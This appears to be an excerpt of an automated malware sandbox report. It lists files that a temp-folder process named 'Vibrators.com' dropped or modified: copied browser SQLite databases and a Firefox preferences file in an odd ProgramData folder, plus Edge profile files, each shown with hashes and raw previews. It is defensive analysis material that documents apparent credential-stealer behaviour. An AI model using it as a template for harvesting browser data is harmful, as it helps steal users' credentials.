SSDEEP:	192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vL:51zkVmvQhyn+Zoz672
MD5:	8B4ED026960EA37550C7FFE6ADFB2DD3
SHA1:	EFFEC68F2A1585A02C38A238FBB84BC458E259B6
SHA-256:	0D9EF40E99393317439C76E6D7758D26550D0A72708973E0A78B41F0D462AD31
SHA-512:	134514FCC07B18650D221913D46AB23100BE64450CD5341D9408A6210F63CAFD71D81F8BB7C46C813889F74E61EC90FFF753BCB214DEB479466BE78342A3A925
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\WBIEKNG4E3WB\AS268YUKF

Download File

Process:	C:\Users\user\AppData\Local\Temp\415434\Vibrators.com
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\WBIEKNG4E3WB\CBASRI

Download File

Process:	C:\Users\user\AppData\Local\Temp\415434\Vibrators.com
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1371207751183456
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cF/I4:MnlyfnGtxnfVuSVumEHFw4
MD5:	643AC1E34BE0FDE5FA0CD279E476DF3A
SHA1:	241B9EA323D640B82E8085803CBE3F61FEEA458F
SHA-256:	C44B4270F1F0B4FCB13533D2FC023443DBAFB24D355286C6AE1493DBCD96B7E2
SHA-512:	73D0F938535D93CC962EF752B1544FA8A2E4194C8979FB4778D0B84B70D32C6EDF8CC8559C9CEFBAF9681FB3BC1D345086AFCA4CA5FC8FB88100E48679AB1EF8
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\WBIEKNG4E3WB\JMGVK6

Download File

Process:	C:\Users\user\AppData\Local\Temp\415434\Vibrators.com
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	155648
Entropy (8bit):	0.5407252242845243
Encrypted:	false
SSDEEP:	96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
MD5:	7B955D976803304F2C0505431A0CF1CF
SHA1:	E29070081B18DA0EF9D98D4389091962E3D37216
SHA-256:	987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
SHA-512:	CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
Malicious:	false
Preview:	SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\WBIEKNG4E3WB\P8QIEK

Download File

Process:	C:\Users\user\AppData\Local\Temp\415434\Vibrators.com
File Type:	ASCII text, with very long lines (1765), with CRLF line terminators
Category:	dropped
Size (bytes):	9526
Entropy (8bit):	5.515924904533179
Encrypted:	false
SSDEEP:	192:efniR4oYbBp6Sp0pUhUxaXd6Y4nysZM2WklbBNBw8DUSl:hejGpCUvY4ysn7tpwx0
MD5:	4580799F1DC5720A7EC1766400E98740
SHA1:	92FD30F47EC545245B934EA492B3C64D5E609AA9
SHA-256:	57F457D69933E9E8A98C32A05EEE96171419977D45AFFA674A9761556656B9FA
SHA-512:	C0787F6584D1D26EBFD5AE59F32046CF1FF5AD1BEB1443F2FE93EB89EFA2F216CBC98E101BA3E38A2837ED9411A9DE1370E29ED96E83D8096547E53FEE964567
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "d3d72102-142d-47cc-a7b7-5b20541f2540");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696496527);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696496528);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\WBIEKNG4E3WB\ZU3O8G

Download File

Process:	C:\Users\user\AppData\Local\Temp\415434\Vibrators.com
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 9, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 9
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.2660466540817115
Encrypted:	false
SSDEEP:	384:KrJ/2qOB1nxCkMQSAELyKOMq+8ETZKoxAXCVumS:K0q+n0JQ9ELyKOMq+8ET8cUZ
MD5:	AB06186A27773276A3EC7D40B78F4652
SHA1:	981D8BDFEC1049895996BD28E052EFED92FC47F9
SHA-256:	CE5B4A41282EE71CDCA0A50034254B5926C21B912709D9C007BB2AA80906D6F1
SHA-512:	80EDE6D1E9D6A46CF2AF378025D7B59F81AFE5E990E8DC6D6A0A826DCB860B754163E60BB30ADA5AF65DE3E5DDB770298770B3F0AABE117FB95185CD80E913A0
Malicious:	false
Preview:	SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\1a96ca0f-9da5-4038-8c91-60f5b1ad8b05.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	58916
Entropy (8bit):	6.104555078601068
Encrypted:	false
SSDEEP:	1536:z/Ps+wsI7ynJCBS2qX7b5wgorQXdbiR3oM:z/0+zI7ynJkS20fXdbe3
MD5:	4C335B0A73C83B05BAE13E894D953DBF
SHA1:	CA530241E5118ABD95F9064D036E4D3834FD7EEC
SHA-256:	32CB4C74E012437F7BC2234CBCD3D13855D28C0F1140698992EB80B05879EC1E
SHA-512:	47A5A97D190E1700AE0AF087C6C88AC46B14E9D807A13B02CDCF95C9C284F1E03814B95BEC2F8AC18FBAA6D74DEA2A965307FC28AFFF1770394BED1B1AC009C2
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\1ca4ac56-128b-4508-a2a5-5339605fad75.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	58900
Entropy (8bit):	6.104622862740495
Encrypted:	false
SSDEEP:	1536:z/Ps+wsI7ynbCBS2qX7bEwgorQXdbiR3oM:z/0+zI7ynbkS20yXdbe3
MD5:	255736A6666C67872F1EBDA81C25A692
SHA1:	1CDAA894A8E2EB13A874C857E5E367843438EC35
SHA-256:	1168C94141C716778BF58776EED0B564B0A5775081E58F64BC6545D25959A8B0
SHA-512:	FF756B48BA582A76AC2F060683633860DA5812BE065403590C3193823AFF1812954E8B3B3883A4121B9F5969CA88BC19AB9900E4D9551C0B36ABA3F67439785F
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\7bec4079-3009-465d-be2e-850af3374ea2.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	58900
Entropy (8bit):	6.104622862740495
Encrypted:	false
SSDEEP:	1536:z/Ps+wsI7ynbCBS2qX7bEwgorQXdbiR3oM:z/0+zI7ynbkS20yXdbe3
MD5:	255736A6666C67872F1EBDA81C25A692
SHA1:	1CDAA894A8E2EB13A874C857E5E367843438EC35
SHA-256:	1168C94141C716778BF58776EED0B564B0A5775081E58F64BC6545D25959A8B0
SHA-512:	FF756B48BA582A76AC2F060683633860DA5812BE065403590C3193823AFF1812954E8B3B3883A4121B9F5969CA88BC19AB9900E4D9551C0B36ABA3F67439785F
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\9495322a-1cce-4bca-a89c-18abc72ae60f.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	58908
Entropy (8bit):	6.1044519689911185
Encrypted:	false
SSDEEP:	1536:z/Ps+wsI7ynmCBS2qX7btwgorQXdbiR3oM:z/0+zI7ynmkS20rXdbe3
MD5:	2F40288A035677FC01CF30B2EDDA70B7
SHA1:	95F8A28B23D4B00E33B4CA55C08A276B10DBC572
SHA-256:	8DC9AD8C2E2B48BD72E4022E6D63183758771506011A3BC4F281A160F4222245
SHA-512:	FBAD7DAC1A7C017CB627C24F60085925790B1F49A775A14ED5459C50180D52890AF52C2AB9976EFF2E10165BDC13058DE953717B96865F217DD224EB0E06D75E
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\9d845f04-56a4-4955-a7b2-dc5250d79cbc.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	58908
Entropy (8bit):	6.1044519689911185
Encrypted:	false
SSDEEP:	1536:z/Ps+wsI7ynmCBS2qX7btwgorQXdbiR3oM:z/0+zI7ynmkS20rXdbe3
MD5:	2F40288A035677FC01CF30B2EDDA70B7
SHA1:	95F8A28B23D4B00E33B4CA55C08A276B10DBC572
SHA-256:	8DC9AD8C2E2B48BD72E4022E6D63183758771506011A3BC4F281A160F4222245
SHA-512:	FBAD7DAC1A7C017CB627C24F60085925790B1F49A775A14ED5459C50180D52890AF52C2AB9976EFF2E10165BDC13058DE953717B96865F217DD224EB0E06D75E
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\ab0cf4e7-ec2f-48a1-a2f2-2788056757f5.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	107893
Entropy (8bit):	4.640132669903667
Encrypted:	false
SSDEEP:	1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7+:fwUQC5VwBIiElEd2K57P7+
MD5:	18D8F6617A5020376CEDA06FB42C24D5
SHA1:	F921FF53D8E1A065550AD835D89E550FDF448795
SHA-256:	C0E1D05E90044F0F5810E83826BE6449D44234CD601668E5E041FE7F3B2CAB32
SHA-512:	4FC6D77BDE79EB4EA56D8CFAEE5908C6D9233E65AD199C52A7425B76ECE9869466D3BE52E2A20B85FE50ABD712C57D8591DEBDDB9F3CBA45070E3233CC185DA4
Malicious:	false
Preview:	{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	107893
Entropy (8bit):	4.640132669903667
Encrypted:	false
SSDEEP:	1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7+:fwUQC5VwBIiElEd2K57P7+
MD5:	18D8F6617A5020376CEDA06FB42C24D5
SHA1:	F921FF53D8E1A065550AD835D89E550FDF448795
SHA-256:	C0E1D05E90044F0F5810E83826BE6449D44234CD601668E5E041FE7F3B2CAB32
SHA-512:	4FC6D77BDE79EB4EA56D8CFAEE5908C6D9233E65AD199C52A7425B76ECE9869466D3BE52E2A20B85FE50ABD712C57D8591DEBDDB9F3CBA45070E3233CC185DA4
Malicious:	false
Preview:	{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-67632BE6-494.pma

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.04731565533657665
Encrypted:	false
SSDEEP:	192:5Ko0m5tm4nOAW5YBJPi6VBK/7+HfgHX+ZIgMEYTwghBMNsb+zRQcKaJRpn8y08TQ:8o0Utfpd4xphqPVZXp08T2RGOD
MD5:	DD9791685E0524A3E68AC26FD821377B
SHA1:	C4842F503F358836EDE71A9224586988E6E58B58
SHA-256:	EE64321732F39447726D4CF95EA78B9098E63DBC70B0FA2A3E20E4BBEA200C3D
SHA-512:	2EBBDDB5E75FDE327D0FAA8E8E2A3C30E58F6AE2B0955B0F409CE1EC156B7D078F5502388A6619DEAFB0C983F5F72C75C680C5E9B5AAF38A838435A5035F333E
Malicious:	false
Preview:	...@..@...@.....C.].....@...............xj..0Z..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB...Windows NT..10.0.190452l..x86_64..?.......".idruil20,1(.0..8..B.......2.:.M....U....e...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J...I.r.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............%..................-...w..U..G...W6.>.........."....."...24.."."93dRcxCw0cDlBQeAYE33nFACeirrSGEv1FXdrR8ueYg=".:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z....Mb.XiP@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2.........5...... .2.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-67632BE7-1B04.pma

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.04455984636068909
Encrypted:	false
SSDEEP:	192:bpu0m5tm4nOAW6YyJwA8x5XSggykfhbNNETfIz/0TQs+BRr2n8y08Tcm2RGOdB:du0UtfFQk9hZrWKBk08T2RGOD
MD5:	F877E3926D45557328A679E432ECE15A
SHA1:	C14426ADDA9F0D61E5359A9D9035EE12DE5B8DEE
SHA-256:	B736B77CE86E6FD70C4903C2EC1BE83D2B595248879A6EFCC8CEADA5736F41AD
SHA-512:	6369CACC84D45F7E9342EFE69FADEEDB6A6B1B8F013B80E36A6599E5E194CE1511FE7CAF24FC87BF6776BBFE51AAC2C1ABE768D03AE5AF35F666B9523397C0E5
Malicious:	false
Preview:	...@..@...@.....C.].....@...............Hc...S..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB...Windows NT..10.0.190452l..x86_64..?.......".idruil20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............%..................-...w..U?:K...G...W6.>.........."....."...24.."."93dRcxCw0cDlBQeAYE33nFACeirrSGEv1FXdrR8ueYg=".:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z....Mb.XiP@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2........6...... .2........

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-67632BF1-1F0C.pma

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.04516348895649175
Encrypted:	false
SSDEEP:	192:aMMr0m5tm4nOAW6YeJJpjrZXpAgiT/hjT7NE2IddYeRQ8Kt3sQn8y08Tcm2RGOdB:Ir0UtfZBNIhjSBA3N08T2RGOD
MD5:	261C736157C443F8E44C72EF4BD900A2
SHA1:	4F90E37B271DBCC8EB1C94839CF18CAA3A09FC56
SHA-256:	DD2F2D254E561D4197270FC4C5D46230F8F5C9ABB6B4DB339A432653A72D21DC
SHA-512:	1FDD2949570DED8D92657A7F2A49440E3F2C31857E934991CA6BD20E4C025260CBB23B5F409981C8B7447D8DEB1E341E914AAA3B1A7A73A04BCA1A87F6D86452
Malicious:	false
Preview:	...@..@...@.....C.].....@................f...U..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB...Windows NT..10.0.190452l..x86_64..?.......".idruil20,1(.0..8..B.......2.:.M....U....e...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............%..................-...w..U..G...W6.>.........."....."...24.."."93dRcxCw0cDlBQeAYE33nFACeirrSGEv1FXdrR8ueYg=".:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z....Mb.XiP@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2............... .2........V..

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-67632BF2-E64.pma

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.4376165997515295
Encrypted:	false
SSDEEP:	3072:45ks5ktZBm0WV4V+NtEvkcV7VnuK0pcA/j1yj+dmO/qpgsrzQg1HFB:Rs5Wj+NtWkcVIKGByOmO/qpgsrzQaHf
